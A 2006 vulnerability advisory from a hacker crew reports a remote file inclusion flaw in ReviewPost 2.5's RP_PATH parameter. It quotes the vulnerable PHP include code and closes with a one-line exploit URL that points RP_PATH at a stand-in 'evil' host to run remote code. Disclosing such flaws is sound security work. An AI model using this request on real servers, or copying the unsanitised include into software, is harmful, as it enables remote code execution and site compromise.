home_edition2001-adv-01.txt

`#############################Solpot Crew Community##############################  
#  
# ReviewPost 2.5 (RP_PATH) Remote File Inclusion   
#  
# Donwload File : http://3-bius.com/ReviewPost.zip  
#  
#################################################################################  
#  
#  
# Bug Found By :home_edition2001 a.k.a (bius) (15-09-2006)  
#  
# contact: [email protected]   
#   
# Website : http://www.nyubicrew.org/adv/home_edition2001-adv-01.txt  
#  
################################################################################  
#  
#  
# Greetz: Solpot,Matdule,Fungky,psycho_l061c,rm_2online,ax[I]xu,can4da_dry  
# imam26_it,ant1casper(tolong tambahin ya)  
# #nyubi , #hitamputih @dalnet  
# and all member solpotcrew community  
# http://www.nyubicrew.org/forum/  
# especially thx to Solpot @ [email protected]  
#  
###############################################################################  
Input passed to the "RP_PATH" is not properly verified   
before being used to include files. This can be exploited to execute   
arbitrary PHP code by including files from local or external resources.   
  
code from index.php  
  
<?php  
require "pp-inc.php";  
  
if ( is_numeric($argv[0]) ) {  
header("Location: {$Globals['maindir']}/showproduct.php?product={$argv[0]}");  
exit;  
}  
  
require "$RP_PATH/languages/$rplang/index.php";  
require "$RP_PATH/login-inc.php";  
  
if ( file_exists("install.php") || file_exists("{$Globals['maindir']}/install.php") ) {  
diewell( "For security reasons, please remove the install.php from the ReviewPost directory before proceeding." );  
exit;  
}  
  
?>  
  
nb : others file has vulnerable too :)  
  
exploit : http://somehost/path_to_ReviewPost/index.php?RP_PATH=http://evil  
  
#############################################################################   
######################################E.O.F##################################   
`